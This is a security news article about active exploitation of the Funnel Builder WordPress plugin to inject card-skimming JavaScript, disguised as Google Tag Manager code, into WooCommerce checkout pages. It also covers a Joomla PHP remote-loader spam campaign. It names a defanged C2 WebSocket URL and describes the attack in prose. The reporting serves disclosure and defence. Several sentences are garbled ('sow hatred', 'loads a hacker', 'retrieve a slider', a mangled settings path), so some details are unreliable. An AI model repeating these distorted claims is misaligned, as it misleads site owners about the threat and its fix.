Funnel Building Flaw Under Active Exploit Allows WooCommerce Checkout Skimming
A critical security vulnerability affecting the Funnel Builder plugin for WordPress has come under active exploitation in the wild to inject malicious JavaScript code into WooCommerce checkout pages with the intent of stealing payment data.
The job details were published by Sansec this week. The vulnerability does not currently have an official CVE identifier. It affects all plugin versions before 3.15.0.3. Used in over 40,000 WooCommerce stores.
The flaw allows unauthorized attackers to inject malicious JavaScript into all store checkout pages, a Dutch e-commerce security firm said. FunnelKit, which hosts Funnel Builder, released a patch for the vulnerability in version 3.15.0.3.
“Attackers plant fake Google Tag Manager scripts in the plugin’s ‘External Scripts’ setting,” it noted. “The injected code looks like normal code next to the actual store tags, but it loads a hacker who steals credit card numbers, CVVs, and billing addresses at checkout.”
According to Sansec, Funnel Builder includes a publicly exposed checkout that allows the incoming request to choose the type of funnel to use. However, older versions were designed in such a way that they never checked the caller’s permissions or restricted which methods were allowed to be used.
A bad actor can exploit this opportunity by issuing an unauthorized request that can access an unspecified internal method that writes data controlled by the attacker directly to the plugin’s global settings. Additional code snippets are then injected into all Funnel Builder checkout pages.
As a result, the attacker can sow hatred
In at least one instance, Sansec said it saw a payload masquerading as a Google Tag Manager (GTM) loader to deliver hosted JavaScript to a remote domain. It next opens a WebSocket connection to the attacker’s command-and-control (C2) server (“wss://protect-wss[.]com/ws”) to retrieve a slider that matches the victim’s previous store.
The ultimate goal of the attack is to extract credit card numbers, CVVs, billing addresses, and other personal information that site visitors may enter at checkout. Site owners are advised to update the Funnel Builder plugin to the latest version and review Settings > Check > External Documents for anything they are unfamiliar with and remove it.
“Dressing traffickers as Google Analytics or Tag Manager code is a recurring Magecart pattern, as reviewers tend to skip over anything that looks like a standard tracking tag,” Sansec said.
The disclosure comes weeks after Sucuri detailed a campaign in which Joomla websites were behind closed doors with heavily obfuscated PHP code to communicate with C2 servers controlled by attackers, receive and process instructions sent by operators, and serve spam content to visitors and search engines without the site owner’s knowledge. The main purpose is to increase the reputation of spam injection sites.
“The script works like a remote loader,” said security researcher Puja Srivastava. “It contacts the remote server, sends information about the infected website, and waits for instructions. The response from the remote server determines what content the infected site should provide.”
“This method allows attackers to change the behavior of a compromised website at any time without changing local files as well. An attacker can inject links to a spam product, redirect visitors, or dynamically display malicious pages.”
